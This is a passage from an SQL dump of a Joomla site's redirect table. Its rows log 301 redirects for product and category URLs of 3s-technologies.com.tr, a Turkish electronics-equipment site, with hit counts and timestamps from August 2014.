00:00:00',301),(722,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',9,0,'2014-08-04 17:26:24','0000-00-00 00:00:00',301),(723,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',9,0,'2014-08-04 17:26:29','0000-00-00 00:00:00',301),(724,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',1,0,'2014-08-04 17:26:33','0000-00-00 00:00:00',301),(725,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',1,0,'2014-08-04 17:26:39','0000-00-00 00:00:00',301),(726,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',35,0,'2014-08-04 17:26:45','0000-00-00 00:00:00',301),(727,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2014-08-04 17:26:50','0000-00-00 00:00:00',301),(728,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',4,0,'2014-08-04 17:26:53','0000-00-00 00:00:00',301),(729,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',36,0,'2014-08-04 17:26:55','0000-00-00 00:00:00',301),(730,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',12,0,'2014-08-04 17:27:02','0000-00-00 00:00:00',301),(731,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',1,0,'2014-08-04 17:27:06','0000-00-00 00:00:00',301),(732,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',30,0,'2014-08-04 17:27:12','0000-00-00 00:00:00',301),(733,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',1,0,'2014-08-04 17:27:17','0000-00-00 00:00:00',301),(734,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-04 17:27:22','0000-00-00 00:00:00',301),(735,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',15,0,'2014-08-04 17:27:25','0000-00-00 00:00:00',301),(736,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',19,0,'2014-08-04 17:27:28','0000-00-00 00:00:00',301),(737,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',19,0,'2014-08-04 17:27:33','0000-00-00 00:00:00',301),(738,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',9,0,'2014-08-04 17:27:38','0000-00-00 00:00:00',301),(739,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',12,0,'2014-08-04 17:27:46','0000-00-00 00:00:00',301),(740,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',1,0,'2014-08-04 17:27:51','0000-00-00 00:00:00',301),(741,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',16,0,'2014-08-04 17:27:57','0000-00-00 00:00:00',301),(742,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',67,0,'2014-08-04 17:28:10','0000-00-00 00:00:00',301),(743,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',2,0,'2014-08-04 17:31:12','0000-00-00 00:00:00',301),(744,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',2,0,'2014-08-04 17:31:24','0000-00-00 00:00:00',301),(745,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',2,0,'2014-08-04 17:31:38','0000-00-00 00:00:00',301),(746,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',3,0,'2014-08-04 17:31:41','0000-00-00 00:00:00',301),(747,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',2,0,'2014-08-04 17:31:54','0000-00-00 00:00:00',301),(748,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',2,0,'2014-08-04 17:31:58','0000-00-00 00:00:00',301),(749,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',2,0,'2014-08-04 17:32:11','0000-00-00 00:00:00',301),(750,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',2,0,'2014-08-04 17:32:13','0000-00-00 00:00:00',301),(751,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',2,0,'2014-08-04 17:32:27','0000-00-00 00:00:00',301),(752,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',1,0,'2014-08-04 17:33:16','0000-00-00 00:00:00',301),(753,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',1,0,'2014-08-04 17:35:04','0000-00-00 00:00:00',301),(754,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',13,0,'2014-08-04 17:35:16','0000-00-00 00:00:00',301),(755,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',1,0,'2014-08-04 17:35:22','0000-00-00 00:00:00',301),(756,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',2,0,'2014-08-04 17:35:42','0000-00-00 00:00:00',301),(757,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',2,0,'2014-08-04 17:35:55','0000-00-00 00:00:00',301),(758,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',1,0,'2014-08-04 17:37:19','0000-00-00 00:00:00',301),(759,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',1,0,'2014-08-04 17:38:16','0000-00-00 00:00:00',301),(760,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',1,0,'2014-08-04 17:38:30','0000-00-00 00:00:00',301),(761,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',1,0,'2014-08-04 17:39:12','0000-00-00 00:00:00',301),(762,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',1,0,'2014-08-04 17:40:30','0000-00-00 00:00:00',301),(763,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',2,0,'2014-08-04 17:42:06','0000-00-00 00:00:00',301),(764,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',2,0,'2014-08-04 17:42:53','0000-00-00 00:00:00',301),(765,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',1,0,'2014-08-04 17:43:02','0000-00-00 00:00:00',301),(766,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',1,0,'2014-08-04 17:43:33','0000-00-00 00:00:00',301),(767,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',1,0,'2014-08-04 17:43:56','0000-00-00 00:00:00',301),(768,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',2,0,'2014-08-04 17:44:50','0000-00-00 00:00:00',301),(769,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',1,0,'2014-08-04 17:45:21','0000-00-00 00:00:00',301),(770,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',68,0,'2014-08-04 17:46:11','0000-00-00 00:00:00',301),(771,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',72,0,'2014-08-04 17:46:16','0000-00-00 00:00:00',301),(772,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',77,0,'2014-08-04 17:46:22','0000-00-00 00:00:00',301),(773,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',70,0,'2014-08-04 17:47:22','0000-00-00 00:00:00',301),(774,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',63,0,'2014-08-04 17:47:29','0000-00-00 00:00:00',301),(775,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',60,0,'2014-08-04 17:47:34','0000-00-00 00:00:00',301),(776,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',52,0,'2014-08-04 17:47:40','0000-00-00 00:00:00',301),(777,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',59,0,'2014-08-04 17:47:47','0000-00-00 00:00:00',301),(778,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',61,0,'2014-08-04 17:48:00','0000-00-00 00:00:00',301),(779,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',50,0,'2014-08-04 17:48:11','0000-00-00 00:00:00',301),(780,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',74,0,'2014-08-04 17:48:16','0000-00-00 00:00:00',301),(781,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',2,0,'2014-08-04 17:48:21','0000-00-00 00:00:00',301),(782,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-04 17:48:35','0000-00-00 00:00:00',301),(783,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-04 17:48:46','0000-00-00 00:00:00',301),(784,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',2,0,'2014-08-04 17:48:48','0000-00-00 00:00:00',301),(785,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',2,0,'2014-08-04 17:48:59','0000-00-00 00:00:00',301),(786,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',2,0,'2014-08-04 17:49:02','0000-00-00 00:00:00',301),(787,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',2,0,'2014-08-04 17:49:14','0000-00-00 00:00:00',301),(788,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',2,0,'2014-08-04 17:49:45','0000-00-00 00:00:00',301),(789,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',2,0,'2014-08-04 17:49:59','0000-00-00 00:00:00',301),(790,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',2,0,'2014-08-04 17:50:15','0000-00-00 00:00:00',301),(791,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',2,0,'2014-08-04 17:50:49','0000-00-00 00:00:00',301),(792,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',2,0,'2014-08-04 17:51:00','0000-00-00 00:00:00',301),(793,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',2,0,'2014-08-04 17:51:12','0000-00-00 00:00:00',301),(794,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',2,0,'2014-08-04 17:51:44','0000-00-00 00:00:00',301),(795,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',2,0,'2014-08-04 17:51:46','0000-00-00 00:00:00',301),(796,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',2,0,'2014-08-04 17:51:57','0000-00-00 00:00:00',301),(797,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',2,0,'2014-08-04 17:51:59','0000-00-00 00:00:00',301),(798,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',2,0,'2014-08-04 17:52:10','0000-00-00 00:00:00',301),(799,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',2,0,'2014-08-04 17:52:13','0000-00-00 00:00:00',301),(800,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',2,0,'2014-08-04 17:52:24','0000-00-00 00:00:00',301),(801,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',2,0,'2014-08-04 17:52:26','0000-00-00 00:00:00',301),(802,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',2,0,'2014-08-04 17:52:37','0000-00-00 00:00:00',301),(803,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',2,0,'2014-08-04 17:52:39','0000-00-00 00:00:00',301),(804,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',2,0,'2014-08-04 17:52:50','0000-00-00 00:00:00',301),(805,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',2,0,'2014-08-04 17:52:52','0000-00-00 00:00:00',301),(806,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',2,0,'2014-08-04 17:53:03','0000-00-00 00:00:00',301),(807,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',2,0,'2014-08-04 17:53:06','0000-00-00 00:00:00',301),(808,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',25,0,'2014-08-04 17:54:45','0000-00-00 00:00:00',301),(809,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',16,0,'2014-08-04 18:01:02','0000-00-00 00:00:00',301),(810,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',3,0,'2014-08-04 18:08:43','0000-00-00 00:00:00',301),(811,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',4,0,'2014-08-04 18:27:44','0000-00-00 00:00:00',301),(812,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',32,0,'2014-08-04 18:32:47','0000-00-00 00:00:00',301),(813,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',5,0,'2014-08-04 18:41:02','0000-00-00 00:00:00',301),(814,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',5,0,'2014-08-04 18:44:19','0000-00-00 00:00:00',301),(815,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',4,0,'2014-08-04 18:44:22','0000-00-00 00:00:00',301),(816,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153','','','',3,0,'2014-08-04 19:01:03','0000-00-00 00:00:00',301),(817,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',14,0,'2014-08-04 19:07:43','0000-00-00 00:00:00',301),(818,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',7,0,'2014-08-04 19:15:07','0000-00-00 00:00:00',301),(819,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',5,0,'2014-08-04 19:44:25','0000-00-00 00:00:00',301),(820,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',35,0,'2014-08-04 19:50:15','0000-00-00 00:00:00',301),(821,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87','','','',5,0,'2014-08-04 20:01:06','0000-00-00 00:00:00',301),(822,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',2,0,'2014-08-04 20:17:00','0000-00-00 00:00:00',301),(823,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',8,0,'2014-08-04 20:21:05','0000-00-00 00:00:00',301),(824,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',1,0,'2014-08-04 20:25:22','0000-00-00 00:00:00',301),(825,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',2,0,'2014-08-04 20:42:14','0000-00-00 00:00:00',301),(826,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140','','','',7,0,'2014-08-04 20:47:05','0000-00-00 00:00:00',301),(827,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164','','','',4,0,'2014-08-04 20:54:25','0000-00-00 00:00:00',301),(828,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',2,0,'2014-08-04 20:59:24','0000-00-00 00:00:00',301),(829,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',1,0,'2014-08-04 21:28:45','0000-00-00 00:00:00',301),(830,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',42,0,'2014-08-04 21:58:45','0000-00-00 00:00:00',301),(831,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',4,0,'2014-08-04 22:27:06','0000-00-00 00:00:00',301),(832,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',2,0,'2014-08-04 22:27:43','0000-00-00 00:00:00',301),(833,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',2,0,'2014-08-04 22:27:45','0000-00-00 00:00:00',301),(834,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',10,0,'2014-08-04 22:50:10','0000-00-00 00:00:00',301),(835,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',3,0,'2014-08-04 23:02:46','0000-00-00 00:00:00',301),(836,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',2,0,'2014-08-04 23:08:31','0000-00-00 00:00:00',301),(837,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',6,0,'2014-08-04 23:18:45','0000-00-00 00:00:00',301),(838,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',6,0,'2014-08-04 23:18:50','0000-00-00 00:00:00',301),(839,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',40,0,'2014-08-04 23:30:22','0000-00-00 00:00:00',301),(840,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',6,0,'2014-08-04 23:34:55','0000-00-00 00:00:00',301),(841,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',14,0,'2014-08-04 23:35:42','0000-00-00 00:00:00',301),(842,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',1,0,'2014-08-04 23:38:34','0000-00-00 00:00:00',301),(843,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',1,0,'2014-08-04 23:59:27','0000-00-00 00:00:00',301),(844,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',1,0,'2014-08-05 00:10:06','0000-00-00 00:00:00',301),(845,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',1,0,'2014-08-05 00:10:07','0000-00-00 00:00:00',301),(846,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',7,0,'2014-08-05 00:15:23','0000-00-00 00:00:00',301),(847,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',9,0,'2014-08-05 00:15:28','0000-00-00 00:00:00',301),(848,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',8,0,'2014-08-05 00:15:42','0000-00-00 00:00:00',301),(849,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',27,0,'2014-08-05 00:23:42','0000-00-00 00:00:00',301),(850,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',2,0,'2014-08-05 00:37:28','0000-00-00 00:00:00',301),(851,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',4,0,'2014-08-05 00:45:47','0000-00-00 00:00:00',301),(852,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',23,0,'2014-08-05 00:48:17','0000-00-00 00:00:00',301),(853,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61','','','',8,0,'2014-08-05 01:14:25','0000-00-00 00:00:00',301),(854,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',2,0,'2014-08-05 01:21:05','0000-00-00 00:00:00',301),(855,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',4,0,'2014-08-05 01:39:24','0000-00-00 00:00:00',301),(856,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',3,0,'2014-08-05 01:44:53','0000-00-00 00:00:00',301),(857,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',2,0,'2014-08-05 01:50:38','0000-00-00 00:00:00',301),(858,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',9,0,'2014-08-05 02:08:42','0000-00-00 00:00:00',301),(859,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',25,0,'2014-08-05 02:24:16','0000-00-00 00:00:00',301),(860,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',2,0,'2014-08-05 02:25:12','0000-00-00 00:00:00',301),(861,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',27,0,'2014-08-05 02:32:24','0000-00-00 00:00:00',301),(862,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',15,0,'2014-08-05 02:40:22','0000-00-00 00:00:00',301),(863,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',5,0,'2014-08-05 02:40:51','0000-00-00 00:00:00',301),(864,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',1,0,'2014-08-05 03:00:24','0000-00-00 00:00:00',301),(865,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',16,0,'2014-08-05 03:06:39','0000-00-00 00:00:00',301),(866,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',8,0,'2014-08-05 03:09:02','0000-00-00 00:00:00',301),(867,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',2,0,'2014-08-05 03:24:53','0000-00-00 00:00:00',301),(868,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',2,0,'2014-08-05 03:29:31','0000-00-00 00:00:00',301),(869,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',2,0,'2014-08-05 03:30:31','0000-00-00 00:00:00',301),(870,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-05 03:39:47','0000-00-00 